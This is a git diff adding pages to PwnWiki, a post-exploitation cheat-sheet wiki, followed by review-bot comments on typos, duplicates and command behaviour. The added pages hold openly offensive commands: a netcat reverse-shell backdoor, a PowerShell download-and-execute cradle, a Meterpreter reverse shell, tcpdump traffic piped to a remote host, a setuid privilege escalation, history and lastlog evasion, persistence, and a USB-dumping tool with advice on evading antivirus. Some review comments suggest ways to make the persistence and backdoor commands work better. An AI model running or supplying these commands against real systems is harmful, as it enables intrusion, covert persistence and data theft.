diff --git a/bins/windows.md b/bins/windows.md new file mode 100644 index 0000000..964b81a --- /dev/null +++ b/bins/windows.md @@ -0,0 +1,7 @@ +# Useful Windows Binaries + +Useful Windows binary tools that can be used for post exploitation. + +| Tool | Description / Importance | Contributer | +| ----------- | ------------------------ | ----------- | +| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian | diff --git a/bins/windows/index.md b/bins/windows/index.md new file mode 100644 index 0000000..964b81a --- /dev/null +++ b/bins/windows/index.md @@ -0,0 +1,7 @@ +# Useful Windows Binaries + +Useful Windows binary tools that can be used for post exploitation. + +| Tool | Description / Importance | Contributer | +| ----------- | ------------------------ | ----------- | +| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian | diff --git a/index.md b/index.md index d7c557b..b3b6bae 100644 --- a/index.md +++ b/index.md @@ -8,7 +8,7 @@ ### Live Online Copy: -You can find a copy of the project online at: http://PwnWiki.io +You can find a copy of the project online at: http://pwnwiki.io ### Offline Use: 
@@ -32,8 +32,7 @@ Curators: * [@tekwizz123](https://twitter.com/tekwizz123) [gimmick:TwitterFollow](@tekwizz123) * [@jakx_](https://twitter.com/jakx_) [gimmick:TwitterFollow](@jakx_) * [@TheColonial](https://twitter.com/TheColonial) [gimmick:TwitterFollow](@TheColonial) - * [@Wireghoul](https://twitter.com/Wireghoul) [gimmick:TwitterFollow](@Wireghoul) - + * [@Wireghoul](https://twitter.com/Wireghoul) [gimmick:TwitterFollow](@Wireghoul) If you would like to become a curator, please contact [mubix@hak5.org](mailto:mubix@hak5.org) diff --git a/index.md~ b/index.md~ new file mode 100644 index 0000000..4163770 --- /dev/null +++ b/index.md~ 
@@ -0,0 +1,40 @@ +![](images/logo.jpg) + +[Image Generated Here](http://www.addletters.com/pictures/restaurant-sign-generator/4772466.htm#.UplRZ42PuuY) + +### PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained. + +- - - - - - + +### Live Online Copy: + +You can find a copy of the project online at: http://pwnwiki.io + +### Offline Use: + + 1. Clone the repository or pull the archive ([download zip](https://github.com/pwnwiki/pwnwiki.github.io/archive/master.zip)) of the repo + 2. Open index.html + 3. Most modern browsers don't allow the access of local files from a locally loaded HTML file. On Windows you can use [Mongoose Tiny](http://cesanta.com/downloads.html) or [HFS](http://www.rejetto.com/hfs/) to host the files locally. On OSX and Linux `python -m SimpleHTTPServer` seems to work just fine. + +#### Referenced tools can be found here: https://github.com/mubix/post-exploitation (If they aren't built into the OS) + +- - - - - - +#### Submitting Content +We want/need your help! Please contribute to this project is via GitHub (https://github.com/pwnwiki/pwnwiki.github.io). That allows us to get your project-ready content incorporated into the wiki fast. + +We realize that not everyone can/wants to submit content via GitHub and that's cool. If your go-to content is not up here and you don't want to spend the time becoming a Git Jedi, just visit our [Google Form](https://docs.google.com/forms/d/1N7-jRjnUXoz-UwB2h0du2IrskFJW6hBGs4YsTwvEncE/viewform). Due to the large amount of submissions and content, there may be a delay between your posting and us getting your content into the project. Thanks for your submissions and your patience! 
+ +- - - - - - +Curators: + + * [@mubix](https://twitter.com/mubix) + * [@WebBreacher](https://twitter.com/webbreacher) + * [@tekwizz123](https://twitter.com/tekwizz123) + * [@jakx_](https://twitter.com/jakx_) + * [@TheColonial](https://twitter.com/TheColonial) + * [@Wireghoul](https://twitter.com/Wireghoul) + + +If you would like to become a curator, please contact [mubix@hak5.org](mailto:mubix@hak5.org) + +[gimmick:ForkMeOnGitHub ({ color: 'red', position: 'right' })](http://www.github.com/pwnwiki/pwnwiki.github.io/) diff --git a/persistence/linux/general.md b/persistence/linux/general.md new file mode 100644 index 0000000..0257939 --- /dev/null +++ b/persistence/linux/general.md @@ -0,0 +1,21 @@ + + + +# Linux General Persistence Commands + +Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt. + +###Run command as a daemon +*Note this doesn't work with anything from apache. Runs like & but doesn't care if the parent process closes* +```bash +setsid *command* +``` + diff --git a/persistence/linux/general.md~ b/persistence/linux/general.md~ new file mode 100644 index 0000000..e24603f --- /dev/null +++ b/persistence/linux/general.md~ @@ -0,0 +1,21 @@ + + + +# Linux General Persistence Commands + +Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt. + +###Run command as a daemon +*Note this doesn't work with anything from apache* +```bash +setsid *command* +``` + diff --git a/persistence/linux/index.md b/persistence/linux/index.md new file mode 100644 index 0000000..613c833 --- /dev/null +++ b/persistence/linux/index.md @@ -0,0 +1,5 @@ +# Linux Persistence Commands + +Commands that help you maintain control over a compromised system. + + * [General Commands](general.md) - Commands your could/should use to maintain your hold on the compromised system. 
diff --git a/scripting/bash.md b/scripting/bash.md index 37dd3f3..abf1347 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -89,12 +89,31 @@ grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' tcpdump -w - | nc -v 8.8.8.8 9999 ``` -**Recursively search for files within a directory** +**Recursively search for text contained in files within a directory** ```bash zcat -rf ./* | grep "searchstring" ``` +**Recursively search for files with the specified word within them** +*Submitted by cat on Google Fourms* +```bash +ls -a | find | grep -i "string" +``` + +**Netcat backdoor** +*Does not work with most distro's default version of netcat (most do not define ENABLE_GAPING_SECURITY_HOLE which turns on -e)* +```bash +nc -e /bin/bash *remotecomputer* *port* +OR +nc -e /bin/bash -lp *port* +``` + +**View CPU Information** +```bash +cat /proc/cpuinfo +``` + Credits ----------- -Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions +Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions) diff --git a/scripting/bash.md~ b/scripting/bash.md~ new file mode 100644 index 0000000..ad05c61 --- /dev/null +++ b/scripting/bash.md~ 
@@ -0,0 +1,113 @@ +# Bash Commands for Post Exploitation + +One liners +----------- + +**Resolve a list of hostnames to IP addresses** +```bash +awk < hostnames.txt '{ system("resolveip -s " $1) }' +``` + +**IIS 6.0 IP Disclosure** +```bash +curl -l -O -H "Host:" "example.com" +``` + +**Connect to SSL websites** +```bash +openssl s_client -connect example.com:443 +``` + +**Convert base64 to text** +```bash +echo 'base64string' | base64 -d (Use -D on OSX) +``` + +**Decode ASCII shellcode** +```bash +echo -e *shellcode hex string* (may need to use -i to ignore bad chars) +``` + +**Enumerate DNS of Class C** +```bash +for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done +``` + +**SSH to box and hide from "who" and "lastlog"** +```bash +ssh andrew@10.1.1.1 -T /bin/bash +``` + +**Prevent terminal logging** +```bash +unset HISTFILE +``` + +**Add immutable attribute to a unix file** +```bash +chattr +i *file* +``` + +**SSH into host2 through host1** +```bash +ssh -o "proxycommand ssh -W host2 host1" host2 +``` + +**Nmap setuid privesc** +```bash +nmap --script <(echo 'os.execute("/bin/sh")') +nmap --interactive (for older versions) +``` + +**Transfer files through SSH** +```bash +ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gz +``` + +**Internal port redirect for bypassing services** +```bash +iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444 +``` + +**Enable forwarding on the fly** +```bash +sysctl -w net.ipv4.ip_forward=1 +``` + +**Kill with USR1 developer defined signal** +```bash +kill -USR1 +``` + +**Pull IP addresses from a file** +```bash +grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' +``` + +**Sniff traffic with tcpdump and send to remote tcp socket** +```bash +tcpdump -w - | nc -v 8.8.8.8 9999 +``` + +**Recursively search for text contained in files within a directory** +```bash +zcat -rf ./* | grep "searchstring" +``` + +**Recursively search for files with the specified word within them** +*Submitted 
by cat on Google Fourms* +```bash +ls -a | find | grep -i "string" +``` + +**Netcat backdoor** +```bash +nc -e /bin/bash *remotecomputer* *port* +OR +nc -e /bin/bash -lp *port* +``` + +Credits +----------- +Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions) + diff --git a/scripting/powershell.md b/scripting/powershell.md index f9a19b6..c98e723 100644 --- a/scripting/powershell.md +++ b/scripting/powershell.md @@ -65,49 +65,174 @@ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 * **Output**: *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
1000")).translate([System.Security.Principal.NTAccount])).value
WIN-244VDGE5OGH\johndoe
- ## Using the PowerShell Active Directory Modules - ### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/ - ### Setting Credentials +## Using the PowerShell Active Directory Modules +### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/ +### Setting Credentials * **Command with arguments**: `$cred = Get-Credential` * **Description**: Stores valid credentials in the $cred variable for use with the Active Directory Modules. * **Notes**: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx) - ### Query to List "Domain Admins" +### Query to List "Domain Admins" * **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"` * **Output**: *
**Windows 7:** Show/Hide
distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com
name : Administrator
objectClass : user
objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db
SamAccountName : Administrator
SID : S-1-5-21-2027135834-1792351174-2509185371-500
- ### Enumerate All Servers on Domain +### Enumerate All Servers on Domain * **Command with arguments**: `Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera tingSystem=*Server*))" |select name` * **Output**: *
**Windows 7:** Show/Hide
name
----
PWNT-DC
-Exchange1
-SharePoint1
+Exchange1
SharePoint1 # Powershell CLI short hand: +## PowerShell.exe + +Parameter Shortcut(s) + * Command `c` + * EncodedArguments `ea`, `encodeda` + * EncodedCommand `e`,`ec` + * ExecutionPolicy `ex`,`ep` + * File `f` + * Help `-h`,`-?` or `/h`,`/?` + * InputFormat `i`,`if` + * NoExit `noe` + * NoLogo `nol` + * NoProfile `nop` + * NonInteractive `noni` + * OutputFormat `o`,`of` + * Sta `s` + * WindowStyle `w` -### PowerShell.exe +## powershell_ise.exe Parameter - Shortcut(s) -* Command - `c` -* EncodedArguments - `ea`, `encodeda` -* EncodedCommand - `e`,`ec` -* ExecutionPolicy - `ex`,`ep` -* File - `f` -* Help - `-h`,`-?` or `/h`,`/?` -* InputFormat - `i`,`if` -* NoExit - `noe` -* NoLogo - `nol` -* NoProfile - `nop` -* NonInteractive - `noni` -* OutputFormat - `o`,`of` -* Sta - `s` -* WindowStyle - `w` + * File - `f` + * Help - `-h`,`-?` or `/h`,`/?` + * Mta - `m` + * NoProfile - `n` -### powershell_ise.exe -Parameter - Shortcut(s) -* File - `f` -* Help - `-h`,`-?` or `/h`,`/?` -* Mta - `m` -* NoProfile - `n` \ No newline at end of file + +## Get Info About All Connected Drives + * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()` + * **Output**: + *
**Windows 7:** Show/Hide
+ Name : C:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : C:\ + VolumeLabel : HP +
+ Name : D:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : D:\ + VolumeLabel : DATA +
+ Name : E:\ + DriveType : CDRom + DriveFormat : + IsReady : False + AvailableFreeSpace : + TotalFreeSpace : + TotalSize : + RootDirectory : E:\ + VolumeLabel : +
+ +## Obtain detailed information about a running process or service + * **Command with arguments**: `gps | ?{$_.name -match ""} | ?{$_.id -match ""} | select *` + * **Output**: + *
**Windows 7:** Show/Hide
+ __NounName : Process + Name : firefox + Handles : 383 + VM : 272830464 + WS : 90185728 + PM : 69402624 + NPM : 24676 + Path : C:\Program Files\Mozilla Firefox\firefox.exe + Company : Mozilla Corporation + CPU : 2.1684139 + FileVersion : 26.0 + ProductVersion : 26.0 + Description : Firefox + Product : Firefox + Id : 3176 + PriorityClass : Normal + HandleCount : 383 + WorkingSet : 90185728 + PagedMemorySize : 69402624 + PrivateMemorySize : 69402624 + VirtualMemorySize : 272830464 + TotalProcessorTime : 00:00:02.1684139 + BasePriority : 8 + ExitCode : + HasExited : False + ExitTime : + Handle : 1904 + MachineName : . + MainWindowHandle : 131426 + MainWindowTitle : Mozilla Firefox Start Page - Mozilla Firefox + MainModule : System.Diagnostics.ProcessModule (firefox.exe) + MaxWorkingSet : 1413120 + MinWorkingSet : 204800 + Modules : {System.Diagnostics.ProcessModule (firefox.exe), System.Diagnostics.ProcessModule (ntdll.d + ll), System.Diagnostics.ProcessModule (kernel32.dll), System.Diagnostics.ProcessModule (KE + RNELBASE.dll)...} + NonpagedSystemMemorySize : 24676 + NonpagedSystemMemorySize64 : 24676 + PagedMemorySize64 : 69402624 + PagedSystemMemorySize : 277804 + PagedSystemMemorySize64 : 277804 + PeakPagedMemorySize : 77041664 + PeakPagedMemorySize64 : 77041664 + PeakWorkingSet : 97169408 + PeakWorkingSet64 : 97169408 + PeakVirtualMemorySize : 281219072 + PeakVirtualMemorySize64 : 281219072 + PriorityBoostEnabled : True + PrivateMemorySize64 : 69402624 + PrivilegedProcessorTime : 00:00:00.4992032 + ProcessName : firefox + ProcessorAffinity : 1 + Responding : True + SessionId : 1 + StartInfo : System.Diagnostics.ProcessStartInfo + StartTime : 1/29/2014 8:02:12 PM + SynchronizingObject : + Threads : {2664, 772, 3160, 544...} + UserProcessorTime : 00:00:01.6692107 + VirtualMemorySize64 : 272830464 + EnableRaisingEvents : False + StandardInput : + StandardOutput : + StandardError : + WorkingSet64 : 90185728 + Site : + Container : +
+ +### Translate SID to username + * **Command with arguments**: `((New-Object System.Security.Principal.SecurityIdentifier("")).translate([System.Security.Principal.NTAccount])).value` + * **Output**: + *
**Windows 7:** Show/Hide
+ NT AUTHORITY\SELF +
+ +### Grab each user on the local system and list their last login time, their SSID and their user path. + * **Command with arguments**: `gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto` + * **Output**: + *
**Windows 7:** Show/Hide
+WIN-C77DTCDJS11 S-1-5-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx-xxxx x/xx/2014 x:xx:xx PM C:\Users\xxxx +WIN-C77DTCDJS11 S-1-5-20 C:\Windows\ServiceProfiles\Netwo... +WIN-C77DTCDJS11 S-1-5-19 C:\Windows\ServiceProfiles\Local... +WIN-C77DTCDJS11 S-1-5-18 C:\Windows\system32\config\syste... +
\ No newline at end of file diff --git a/scripting/powershell.md~ b/scripting/powershell.md~ new file mode 100644 index 0000000..9461b51 --- /dev/null +++ b/scripting/powershell.md~ @@ -0,0 +1,121 @@ + + + +# Windows Powershell Commands and Scripts for Post Exploitation + +# One liners + +**Download and Execute Remote Powershell Script** + +``` +iex (New-Object Net.WebClient).DownloadString("http://host/file.txt") +``` + +**Download and Save File** + +``` +(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe') +``` + +**Enumerate Allowed Outbound Ports 1-1024 via [securitypadawan.blogspot.com](http://securitypadawan.blogspot.com/2013/04/quickly-determine-allowed-outbound-ports.html)** + +``` +$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); +$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}} +``` + +**Reverse Shell Using [PowerSploit's Invoke-Shellcode](https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1)** + +``` +Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force +``` + +---- + +# Commands with Sample Output +## Hardware +### Get BIOS Information + * **Command with arguments**: `gwmi win32_bios` + * **Description**: Retrieves BIOS information including system serial number. + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> gwmi win32_bios
SMBIOSBIOSVersion : 6.00
Manufacturer : Phoenix Technologies LTD
Name : PhoenixBIOS 4.0 Release 6.0
SerialNumber : VMware-56 4d 9b 0f 26 ba 8c f9-6e 7a 1e 33 5d 3c f0 dc
Version : INTEL - 6040000
+ +### Get Drive Information + * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()` + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> [System.IO.DriveInfo]::GetDrives()

Name : C:\
DriveType : Fixed
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 55568087552
TotalFreeSpace : 55568087552
TotalSize : 159876850304
RootDirectory : C:\
VolumeLabel :

Name : D:\
DriveType : CDRom
DriveFormat :
IsReady : False
AvailableFreeSpace :
TotalFreeSpace :
TotalSize :
RootDirectory : D:\
VolumeLabel :

Name : G:\
DriveType : Removable
DriveFormat :
IsReady : False
AvailableFreeSpace :
TotalFreeSpace :
TotalSize :
RootDirectory : G:\
VolumeLabel :

Name : V:\
DriveType : Network
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 259182640616
TotalFreeSpace : 259182640616
TotalSize : 827361812256
RootDirectory : V:\
VolumeLabel : TestMappedDrive
+ +## User Information +### Display Username, SID, Last Used + * **Command with arguments**: `gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto` + * **Description**: Retrieves information about system users. + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> gwmi win32\_userprofile | select -unique @{name="Name";expression={$\_.\_\_server}},@{name="SID";expressi
on={$\_.sid}},@{name="LastUseTime";expression={$\_.converttodatetime($\_.lastusetime)}},localpath | ft -auto

Name            SID                                            LastUseTime          localpath
----            ---                                            -----------          ---------
WIN-244VDGE5OGH S-1-5-21-1319606305-3131390644-2280705280-1000 4/13/2012 7:52:02 PM C:\Users\johndoe
WIN-244VDGE5OGH S-1-5-20                                                            C:\Windows\ServiceProfiles\Netwo...
WIN-244VDGE5OGH S-1-5-19                                                            C:\Windows\ServiceProfiles\Local...
WIN-244VDGE5OGH S-1-5-18                                                            C:\Windows\system32\config\syste...
+ +### Translate SID to Username + * **Command with arguments**: `((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value` + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
1000")).translate([System.Security.Principal.NTAccount])).value
WIN-244VDGE5OGH\johndoe
+ + ## Using the PowerShell Active Directory Modules + ### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/ + ### Setting Credentials + * **Command with arguments**: `$cred = Get-Credential` + * **Description**: Stores valid credentials in the $cred variable for use with the Active Directory Modules. + * **Notes**: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx) + + ### Query to List "Domain Admins" + * **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"` + * **Output**: + *
**Windows 7:** Show/Hide
distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com
name : Administrator
objectClass : user
objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db
SamAccountName : Administrator
SID : S-1-5-21-2027135834-1792351174-2509185371-500
+ + ### Enumerate All Servers on Domain + * **Command with arguments**: `Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera +tingSystem=*Server*))" |select name` + * **Output**: + *
**Windows 7:** Show/Hide
name
----
PWNT-DC
+Exchange1
+SharePoint1
+ + ### Get Info About All Connected Drives + * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()` + * **Output**: + *
**Windows 7:** Show/Hide
+ Name : C:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : C:\ + VolumeLabel : HP +
+ Name : D:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : D:\ + VolumeLabel : DATA +
+ Name : E:\ + DriveType : CDRom + DriveFormat : + IsReady : False + AvailableFreeSpace : + TotalFreeSpace : + TotalSize : + RootDirectory : E:\ + VolumeLabel : +
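Review bot: bins/windows.md and bins/windows/index.md are byte-identical (both are blob 964b81a), so the usbdump.exe table is committed twice and the two copies will drift the next time one is edited; keep one path and drop the other. In the table header "Contributer" should be "Contributor", and in the usbdump row "compromized" should be "compromised". The row also never says where usbdump.exe comes from; index.md sends readers to https://github.com/mubix/post-exploitation for referenced tools, so either add it there or link its source, otherwise the "may have to modify it to bypass AV" advice has nothing to act on.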
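Review bot: index.md~, persistence/linux/general.md~, scripting/bash.md~ and scripting/powershell.md~ are editor backup files and should not be part of this commit; they also hold stale copies of the pages they shadow (index.md~ lists the curators without the gimmick:TwitterFollow tags, general.md~ lacks the "Runs like & but doesn't care if the parent process closes" sentence, bash.md~ lacks the ENABLE_GAPING_SECURITY_HOLE caveat and the `cat /proc/cpuinfo` entry), so anyone who lands on a ~ file reads older text than the real page. Remove them with `git rm --cached` and add `*~` to .gitignore so they are not re-added.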
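Review bot: the "Run command as a daemon" entry in persistence/linux/general.md promises more than `setsid *command*` delivers, and its behaviour depends on the calling shell: under an interactive job-control shell the child is already a process group leader, so setsid forks and the prompt returns, but from a script, a web shell or a reverse shell without job control it does not fork and the shell blocks on the command, which is most likely what "doesn't work with anything from apache" is describing. In both cases the command's stdin/stdout/stderr still point at the caller. Suggest `setsid command > /dev/null 2>&1 < /dev/null &` (newer util-linux setsid also has `-f` to force the fork) and rewording the note to say what actually fails. Two smaller points: `###Run command as a daemon` has no space after the hashes and will not render as a heading in CommonMark-style renderers (the other new page, persistence/linux/index.md, uses `# Heading` with a space), and the intro "after you have exploited it" has no antecedent for "it" (read "after you have exploited the host").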
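Review bot: in persistence/linux/index.md the bullet text "Commands your could/should use" should read "Commands you could/should use".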
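Review bot: the new "Recursively search for files with the specified word within them" entry in scripting/bash.md does not do what its title says: `find` ignores stdin, so `ls -a |` is dead, and `find` with no arguments prints every path under `.`, so `grep -i "string"` matches path names, not file contents. For contents use `grep -ril "string" .`; for names use `find . -iname '*string*'`. Either retitle the entry or replace the command. In the Netcat backdoor block the word `OR` sits inside the fence as if it were a command; split it into two fences or make it a `#` comment. The ENABLE_GAPING_SECURITY_HOLE caveat is correct for traditional netcat, but it would help to say what to use instead: Nmap's ncat has `--exec`/`--sh-exec`, and the OpenBSD nc shipped by many distros has no `-e` at all. Typos: "Google Fourms" should be "Google Forums", "distro's" should be "distros'".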
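Review bot: three of the sections this hunk adds to scripting/powershell.md already exist earlier in the same file: "Get Info About All Connected Drives" repeats "Get Drive Information" (same `[System.IO.DriveInfo]::GetDrives()`), "Translate SID to username" repeats "Translate SID to Username", and "Grab each user on the local system..." repeats "Display Username, SID, Last Used" with the identical `gwmi win32_userprofile | select -unique ...` pipeline; drop the new copies or fold the extra sample output into the existing entries. The process entry `gps | ?{$_.name -match ""} | ?{$_.id -match ""} | select *` filters on empty strings, which `-match` treats as match-everything, so as written it dumps every process; show placeholders such as `-match "firefox"` and `-eq 3176`, and drop "or service" from the title since Get-Process does not list services (that is Get-Service). The "Translate SID to username" entry passes `""` to the SecurityIdentifier constructor, which is not a valid SDDL string, yet its output shows `NT AUTHORITY\SELF`; that account is `S-1-5-10`, so put that SID in the command. Smaller points: "SSID" should be "SID"; the powershell.exe shortcut list drops the `Parameter - Shortcut` separator that the powershell_ise.exe list still uses; the new drive and process sections use `##` while the SID and user sections use `###`, so the file's `## category / ### command` layout is not followed; the `-LDAPFilter` string is broken across lines at "opera" / "tingSystem" inside the backticks, so it will not copy as one command; and the file still ends without a trailing newline.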